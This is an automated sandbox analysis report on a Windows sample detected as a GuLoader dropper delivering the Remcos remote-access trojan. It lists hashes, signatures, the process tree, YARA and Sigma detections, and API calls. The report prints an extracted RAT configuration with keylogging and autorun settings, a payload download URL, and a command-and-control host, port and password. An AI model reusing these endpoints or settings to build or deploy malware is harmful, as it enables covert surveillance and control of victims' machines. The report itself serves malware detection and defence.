Play interactive tour

Edit tour

Windows Analysis Report mU9H96igb3.exe

Overview

General Information

Sample Name:	mU9H96igb3.exe
Analysis ID:	1662
MD5:	8777020a37b6797241a489a707b9784b
SHA1:	a1ed1029b967295f9ce5e9d219f41dc6c7fc4d1a
SHA256:	8a45d901cab57a1b65c32aea2452f56436dcf01c37bdf7875838e6054f395d90
Infos:
Most interesting Screenshot:

Detection

Remcos GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Potential malicious icon found

Multi AV Scanner detection for submitted file

Yara detected Remcos RAT

Antivirus / Scanner detection for submitted sample

Detected Remcos RAT

GuLoader behavior detected

Antivirus detection for dropped file

Multi AV Scanner detection for dropped file

Yara detected GuLoader

Hides threads from debuggers

Installs a global keyboard hook

Sigma detected: Suspicious Script Execution From Temp Folder

Tries to detect Any.run

Connects to many ports of the same IP (likely port scanning)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Creates an undocumented autostart registry key

Sigma detected: WScript or CScript Dropper

C2 URLs / IPs found in malware configuration

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Antivirus or Machine Learning detection for unpacked file

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Sleep loop found (likely to delay execution)

Internet Provider seen in connection with other malware

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to call native functions

Contains functionality for execution timing, often used to detect debuggers

Abnormal high CPU Usage

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Sample file is different than original file name gathered from version info

PE file contains strange resources

Drops PE files

Tries to load missing DLLs

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Detected TCP or UDP traffic on non-standard ports

Checks if the current process is being debugged

Dropped file seen in connection with other malware

Creates a process in suspended mode (likely to inject code)

Found WSH timer for Javascript or VBS script (likely evasive script)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

System is w10x64native

mU9H96igb3.exe (PID: 4448 cmdline: 'C:\Users\user\Desktop\mU9H96igb3.exe' MD5: 8777020A37B6797241A489A707B9784B)

mU9H96igb3.exe (PID: 6380 cmdline: 'C:\Users\user\Desktop\mU9H96igb3.exe' MD5: 8777020A37B6797241A489A707B9784B)

wscript.exe (PID: 512 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\install.vbs' MD5: 4D780D8F77047EE1C65F747D9F63A1FE)

cmd.exe (PID: 6504 cmdline: 'C:\Windows\System32\cmd.exe' /c 'C:\Users\user\AppData\Roaming\Adobes\Dlls.exe' MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 1344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

Dlls.exe (PID: 2916 cmdline: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe MD5: 8777020A37B6797241A489A707B9784B)

Dlls.exe (PID: 7852 cmdline: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe MD5: 8777020A37B6797241A489A707B9784B)

Dlls.exe (PID: 2072 cmdline: 'C:\Users\user\AppData\Roaming\Adobes\Dlls.exe' MD5: 8777020A37B6797241A489A707B9784B)

Dlls.exe (PID: 6216 cmdline: 'C:\Users\user\AppData\Roaming\Adobes\Dlls.exe' MD5: 8777020A37B6797241A489A707B9784B)

Dlls.exe (PID: 3384 cmdline: 'C:\Users\user\AppData\Roaming\Adobes\Dlls.exe' MD5: 8777020A37B6797241A489A707B9784B)

Dlls.exe (PID: 7300 cmdline: 'C:\Users\user\AppData\Roaming\Adobes\Dlls.exe' MD5: 8777020A37B6797241A489A707B9784B)

Dlls.exe (PID: 4696 cmdline: 'C:\Users\user\AppData\Roaming\Adobes\Dlls.exe' MD5: 8777020A37B6797241A489A707B9784B)

cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "http://implantecapilarpereira.com/NetGen"}

Threatname: Remcos

{"Host:Port:Password": "monitprradministratioran.loseyourip.com:24091:1", "Assigned name": "NetGeneration", "Connect interval": "1", "Install flag": "Enable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "AppData", "Copy file": "Dlls.exe", "Startup value": "Chrome", "Hide file": "Enable", "Mutex": "Remcos-HCJBCA", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "logs.dat", "Keylog crypt": "Enable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "notepad;solitaire;", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Enable", "Audio record time": "5", "Audio path": "AppData", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Adobes", "Keylog folder": "Adobes", "Keylog file max size": "20000"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000014.00000002.139080988334.00000000007BD000.00000004.00000020.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000009.00000002.137983792450.00000000009E7000.00000004.00000020.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000009.00000002.137982349025.0000000000560000.00000040.00000001.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
0000000F.00000002.138446041726.0000000002C10000.00000040.00000001.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
00000014.00000002.139080067245.0000000000560000.00000040.00000001.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
00000011.00000002.138640980805.0000000004F50000.00000040.00000001.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
00000015.00000002.139148441525.000000000087B000.00000004.00000020.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000012.00000002.138719279197.0000000002340000.00000040.00000001.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
00000015.00000002.139148381196.0000000000870000.00000004.00000020.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000013.00000002.142216309015.00000000008EB000.00000004.00000020.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000002.00000002.137587044438.0000000002BE0000.00000040.00000001.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
00000015.00000002.139147557891.0000000000560000.00000040.00000001.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
Process Memory Space: mU9H96igb3.exe PID: 6380	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: Dlls.exe PID: 7852	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: Dlls.exe PID: 3384	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: Dlls.exe PID: 4696	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Click to see the 11 entries

Sigma Overview

System Summary:

Sigma detected: Suspicious Script Execution From Temp Folder

Show sources

Source: Process started

Author: Florian Roth, Max Altgelt: Data: Command: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\install.vbs' , CommandLine: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\install.vbs' , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: 'C:\Users\user\Desktop\mU9H96igb3.exe' , ParentImage: C:\Users\user\Desktop\mU9H96igb3.exe, ParentProcessId: 6380, ProcessCommandLine: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\install.vbs' , ProcessId: 512

Sigma detected: WScript or CScript Dropper

Show sources

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (rule), oscd.community: Data: Command: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\install.vbs' , CommandLine: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\install.vbs' , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: 'C:\Users\user\Desktop\mU9H96igb3.exe' , ParentImage: C:\Users\user\Desktop\mU9H96igb3.exe, ParentProcessId: 6380, ProcessCommandLine: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\install.vbs' , ProcessId: 512

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000014.00000002.139080988334.00000000007BD000.00000004.00000020.sdmp	Malware Configuration Extractor: Remcos {"Host:Port:Password": "monitprradministratioran.loseyourip.com:24091:1", "Assigned name": "NetGeneration", "Connect interval": "1", "Install flag": "Enable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "AppData", "Copy file": "Dlls.exe", "Startup value": "Chrome", "Hide file": "Enable", "Mutex": "Remcos-HCJBCA", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "logs.dat", "Keylog crypt": "Enable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "notepad;solitaire;", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Enable", "Audio record time": "5", "Audio path": "AppData", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Adobes", "Keylog folder": "Adobes", "Keylog file max size": "20000"}
Source: 00000009.00000002.137982349025.0000000000560000.00000040.00000001.sdmp	Malware Configuration Extractor: GuLoader {"Payload URL": "http://implantecapilarpereira.com/NetGen"}

Multi AV Scanner detection for submitted file

Show sources

Source: mU9H96igb3.exe	Virustotal: Detection: 32%	Perma Link
Source: mU9H96igb3.exe	Metadefender: Detection: 25%	Perma Link
Source: mU9H96igb3.exe	ReversingLabs: Detection: 24%

Yara detected Remcos RAT

Show sources

Source: Yara match	File source: 00000014.00000002.139080988334.00000000007BD000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.137983792450.00000000009E7000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.139148441525.000000000087B000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.139148381196.0000000000870000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.142216309015.00000000008EB000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: mU9H96igb3.exe PID: 6380, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Dlls.exe PID: 7852, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Dlls.exe PID: 3384, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Dlls.exe PID: 4696, type: MEMORYSTR

Antivirus / Scanner detection for submitted sample

Show sources

Source: mU9H96igb3.exe

Avira: detected

Antivirus detection for dropped file

Show sources

Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe

Avira: detection malicious, Label: TR/AD.Nekark.fexqx

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Metadefender: Detection: 25%			Perma Link
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	ReversingLabs: Detection: 24%

Source: 21.0.Dlls.exe.400000.0.unpack	Avira: Label: TR/AD.Nekark.fexqx
Source: 16.0.Dlls.exe.400000.0.unpack	Avira: Label: TR/AD.Nekark.fexqx
Source: 19.0.Dlls.exe.400000.0.unpack	Avira: Label: TR/AD.Nekark.fexqx
Source: 16.2.Dlls.exe.400000.0.unpack	Avira: Label: TR/AD.Nekark.fexqx
Source: 17.0.Dlls.exe.400000.0.unpack	Avira: Label: TR/AD.Nekark.fexqx
Source: 18.0.Dlls.exe.400000.0.unpack	Avira: Label: TR/AD.Nekark.fexqx
Source: 2.0.mU9H96igb3.exe.400000.0.unpack	Avira: Label: TR/AD.Nekark.fexqx
Source: 9.0.mU9H96igb3.exe.400000.0.unpack	Avira: Label: TR/AD.Nekark.fexqx
Source: 15.0.Dlls.exe.400000.0.unpack	Avira: Label: TR/AD.Nekark.fexqx
Source: 20.0.Dlls.exe.400000.0.unpack	Avira: Label: TR/AD.Nekark.fexqx

Source: mU9H96igb3.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Networking:

Connects to many ports of the same IP (likely port scanning)

Show sources

Source: global traffic

TCP traffic: 8.6.8.23 ports 0,1,2,4,9,24091

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor	URLs: http://implantecapilarpereira.com/NetGen
Source: Malware configuration extractor	URLs: monitprradministratioran.loseyourip.com

Source: Joe Sandbox View	ASN Name: AS-CHOOPAUS AS-CHOOPAUS
Source: Joe Sandbox View	ASN Name: MASTER-ASCzechRepublicwwwmasterczCZ MASTER-ASCzechRepublicwwwmasterczCZ

Source: global traffic	HTTP traffic detected: GET /NetGeneration10%20Startup_KCFPCd130.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: implantecapilarpereira.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /NetGeneration10%20Startup_KCFPCd130.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: implantecapilarpereira.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /NetGeneration10%20Startup_KCFPCd130.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: implantecapilarpereira.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /NetGeneration10%20Startup_KCFPCd130.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: implantecapilarpereira.comCache-Control: no-cache

Source: global traffic

TCP traffic: 192.168.11.20:49809 -> 8.6.8.23:24091

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: mU9H96igb3.exe, 00000009.00000002.137982771661.00000000007C0000.00000004.00000001.sdmp, Dlls.exe, 00000013.00000002.142215774564.00000000006F0000.00000004.00000001.sdmp, Dlls.exe, 00000014.00000002.139080544159.0000000000758000.00000004.00000020.sdmp, Dlls.exe, 00000015.00000002.139148878650.00000000023F0000.00000004.00000001.sdmp, Dlls.exe, 00000015.00000002.139147980600.0000000000818000.00000004.00000020.sdmp	String found in binary or memory: http://implantecapilarpereira.com/NetGeneration10%20Startup_KCFPCd130.bin
Source: Dlls.exe, 00000014.00000002.139080944862.00000000007B4000.00000004.00000020.sdmp	String found in binary or memory: http://implantecapilarpereira.com/NetGeneration10%20Startup_KCFPCd130.binHR
Source: mU9H96igb3.exe, 00000009.00000002.137982771661.00000000007C0000.00000004.00000001.sdmp, Dlls.exe, 00000013.00000002.142215774564.00000000006F0000.00000004.00000001.sdmp, Dlls.exe, 00000014.00000002.139080356064.00000000006B0000.00000004.00000001.sdmp, Dlls.exe, 00000015.00000002.139148878650.00000000023F0000.00000004.00000001.sdmp	String found in binary or memory: http://implantecapilarpereira.com/NetGeneration10%20Startup_KCFPCd130.binhttp://implantecapilarperei
Source: Dlls.exe, 00000014.00000002.139080544159.0000000000758000.00000004.00000020.sdmp, Dlls.exe, 00000015.00000002.139147980600.0000000000818000.00000004.00000020.sdmp	String found in binary or memory: http://implantecapilarpereira.com/NetGeneration10%20Startup_KCFPCd130.binn
Source: mU9H96igb3.exe, 00000009.00000002.137983749150.00000000009E0000.00000004.00000020.sdmp	String found in binary or memory: http://implantecapilarpereira.com/NetGeneration10%20Startup_KCFPCd130.bint
Source: mU9H96igb3.exe, 00000009.00000002.137983749150.00000000009E0000.00000004.00000020.sdmp	String found in binary or memory: http://implantecapilarpereira.com/NetGeneration10%20Startup_KCFPCd130.binx

Source: unknown

DNS traffic detected: queries for: implantecapilarpereira.com

Source: global traffic	HTTP traffic detected: GET /NetGeneration10%20Startup_KCFPCd130.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: implantecapilarpereira.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /NetGeneration10%20Startup_KCFPCd130.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: implantecapilarpereira.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /NetGeneration10%20Startup_KCFPCd130.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: implantecapilarpereira.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /NetGeneration10%20Startup_KCFPCd130.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: implantecapilarpereira.comCache-Control: no-cache

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Installs a global keyboard hook

Show sources

Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe

Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\Adobes\Dlls.exe

Jump to behavior

E-Banking Fraud:

Yara detected Remcos RAT

Show sources

Source: Yara match	File source: 00000014.00000002.139080988334.00000000007BD000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.137983792450.00000000009E7000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.139148441525.000000000087B000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.139148381196.0000000000870000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.142216309015.00000000008EB000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: mU9H96igb3.exe PID: 6380, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Dlls.exe PID: 7852, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Dlls.exe PID: 3384, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Dlls.exe PID: 4696, type: MEMORYSTR

System Summary:

Potential malicious icon found

Show sources

Source: initial sample

Icon embedded in PE file: bad icon match: 20047c7c70f0e004

Source: mU9H96igb3.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: C:\Users\user\Desktop\mU9H96igb3.exe	Code function: 2_2_02BF4B8B	2_2_02BF4B8B
Source: C:\Users\user\Desktop\mU9H96igb3.exe	Code function: 2_2_02C0474A	2_2_02C0474A
Source: C:\Users\user\Desktop\mU9H96igb3.exe	Code function: 2_2_02BF087E	2_2_02BF087E
Source: C:\Users\user\Desktop\mU9H96igb3.exe	Code function: 2_2_02BF557A	2_2_02BF557A
Source: C:\Users\user\Desktop\mU9H96igb3.exe	Code function: 2_2_02BE4AA2	2_2_02BE4AA2
Source: C:\Users\user\Desktop\mU9H96igb3.exe	Code function: 2_2_02C01BCE	2_2_02C01BCE
Source: C:\Users\user\Desktop\mU9H96igb3.exe	Code function: 2_2_02BF6BF6	2_2_02BF6BF6
Source: C:\Users\user\Desktop\mU9H96igb3.exe	Code function: 2_2_02C0130A	2_2_02C0130A
Source: C:\Users\user\Desktop\mU9H96igb3.exe	Code function: 2_2_02BFECDD	2_2_02BFECDD
Source: C:\Users\user\Desktop\mU9H96igb3.exe	Code function: 2_2_02BF00C6	2_2_02BF00C6
Source: C:\Users\user\Desktop\mU9H96igb3.exe	Code function: 2_2_02BFE400	2_2_02BFE400
Source: C:\Users\user\Desktop\mU9H96igb3.exe	Code function: 2_2_02BF7574	2_2_02BF7574
Source: C:\Users\user\Desktop\mU9H96igb3.exe	Code function: 9_2_0058474A	9_2_0058474A
Source: C:\Users\user\Desktop\mU9H96igb3.exe	Code function: 9_2_0057557A	9_2_0057557A
Source: C:\Users\user\Desktop\mU9H96igb3.exe	Code function: 9_2_00574B8B	9_2_00574B8B
Source: C:\Users\user\Desktop\mU9H96igb3.exe	Code function: 9_2_0057087E	9_2_0057087E
Source: C:\Users\user\Desktop\mU9H96igb3.exe	Code function: 9_2_0057E400	9_2_0057E400
Source: C:\Users\user\Desktop\mU9H96igb3.exe	Code function: 9_2_0057ECDD	9_2_0057ECDD
Source: C:\Users\user\Desktop\mU9H96igb3.exe	Code function: 9_2_005700C6	9_2_005700C6
Source: C:\Users\user\Desktop\mU9H96igb3.exe	Code function: 9_2_005800B4	9_2_005800B4
Source: C:\Users\user\Desktop\mU9H96igb3.exe	Code function: 9_2_00564AA2	9_2_00564AA2
Source: C:\Users\user\Desktop\mU9H96igb3.exe	Code function: 9_2_00577574	9_2_00577574
Source: C:\Users\user\Desktop\mU9H96igb3.exe	Code function: 9_2_0058130A	9_2_0058130A
Source: C:\Users\user\Desktop\mU9H96igb3.exe	Code function: 9_2_00581BCE	9_2_00581BCE
Source: C:\Users\user\Desktop\mU9H96igb3.exe	Code function: 9_2_00576BF6	9_2_00576BF6
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Code function: 15_2_02C24B8B	15_2_02C24B8B
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Code function: 15_2_02C3474A	15_2_02C3474A
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Code function: 15_2_02C2087E	15_2_02C2087E
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Code function: 15_2_02C2557A	15_2_02C2557A
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Code function: 15_2_02C14AA2	15_2_02C14AA2
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Code function: 15_2_02C31BCE	15_2_02C31BCE
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Code function: 15_2_02C26BF6	15_2_02C26BF6
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Code function: 15_2_02C3130A	15_2_02C3130A
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Code function: 15_2_02C200C6	15_2_02C200C6
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Code function: 15_2_02C2ECDD	15_2_02C2ECDD
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Code function: 15_2_02C2E400	15_2_02C2E400
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Code function: 15_2_02C27574	15_2_02C27574
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Code function: 17_2_04F6087E	17_2_04F6087E
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Code function: 17_2_04F64B8B	17_2_04F64B8B
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Code function: 17_2_04F6557A	17_2_04F6557A
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Code function: 17_2_04F7474A	17_2_04F7474A
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Code function: 17_2_04F6ECDD	17_2_04F6ECDD
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Code function: 17_2_04F600C6	17_2_04F600C6
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Code function: 17_2_04F54AA2	17_2_04F54AA2
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Code function: 17_2_04F6E400	17_2_04F6E400
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Code function: 17_2_04F66BF6	17_2_04F66BF6
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Code function: 17_2_04F71BCE	17_2_04F71BCE
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Code function: 17_2_04F67574	17_2_04F67574
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Code function: 17_2_04F7130A	17_2_04F7130A
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Code function: 18_2_0235087E	18_2_0235087E
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Code function: 18_2_0235557A	18_2_0235557A
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Code function: 18_2_0236474A	18_2_0236474A
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Code function: 18_2_02354B8B	18_2_02354B8B
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Code function: 18_2_0235E400	18_2_0235E400
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Code function: 18_2_02344AA2	18_2_02344AA2
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Code function: 18_2_0235ECDD	18_2_0235ECDD
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Code function: 18_2_023500C6	18_2_023500C6
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Code function: 18_2_0236130A	18_2_0236130A
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Code function: 18_2_02357574	18_2_02357574
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Code function: 18_2_02356BF6	18_2_02356BF6
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Code function: 18_2_02361BCE	18_2_02361BCE
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Code function: 20_2_0058474A	20_2_0058474A
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Code function: 20_2_0057557A	20_2_0057557A
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Code function: 20_2_00574B8B	20_2_00574B8B
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Code function: 20_2_0057087E	20_2_0057087E
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Code function: 20_2_0057E400	20_2_0057E400
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Code function: 20_2_0057ECDD	20_2_0057ECDD
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Code function: 20_2_005700C6	20_2_005700C6
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Code function: 20_2_005800B4	20_2_005800B4
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Code function: 20_2_00564AA2	20_2_00564AA2
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Code function: 20_2_00577574	20_2_00577574
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Code function: 20_2_0058130A	20_2_0058130A
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Code function: 20_2_00581BCE	20_2_00581BCE
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Code function: 20_2_00576BF6	20_2_00576BF6
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Code function: 21_2_0058474A	21_2_0058474A
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Code function: 21_2_0057557A	21_2_0057557A
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Code function: 21_2_00574B8B	21_2_00574B8B
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Code function: 21_2_0057087E	21_2_0057087E
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Code function: 21_2_0057E400	21_2_0057E400
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Code function: 21_2_0057ECDD	21_2_0057ECDD
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Code function: 21_2_005700C6	21_2_005700C6
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Code function: 21_2_005800B4	21_2_005800B4
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Code function: 21_2_00564AA2	21_2_00564AA2
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Code function: 21_2_00577574	21_2_00577574
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Code function: 21_2_0058130A	21_2_0058130A
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Code function: 21_2_00581BCE	21_2_00581BCE
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Code function: 21_2_00576BF6	21_2_00576BF6

Source: C:\Users\user\Desktop\mU9H96igb3.exe	Code function: 2_2_02C0474A NtSetInformationThread,	2_2_02C0474A
Source: C:\Users\user\Desktop\mU9H96igb3.exe	Code function: 2_2_02C04084 NtProtectVirtualMemory,	2_2_02C04084
Source: C:\Users\user\Desktop\mU9H96igb3.exe	Code function: 2_2_02BF087E NtWriteVirtualMemory,	2_2_02BF087E
Source: C:\Users\user\Desktop\mU9H96igb3.exe	Code function: 2_2_02BF557A NtAllocateVirtualMemory,	2_2_02BF557A
Source: C:\Users\user\Desktop\mU9H96igb3.exe	Code function: 2_2_02C0130A NtWriteVirtualMemory,	2_2_02C0130A
Source: C:\Users\user\Desktop\mU9H96igb3.exe	Code function: 2_2_02BF7574 NtWriteVirtualMemory,	2_2_02BF7574
Source: C:\Users\user\Desktop\mU9H96igb3.exe	Code function: 9_2_00586E0F NtProtectVirtualMemory,	9_2_00586E0F
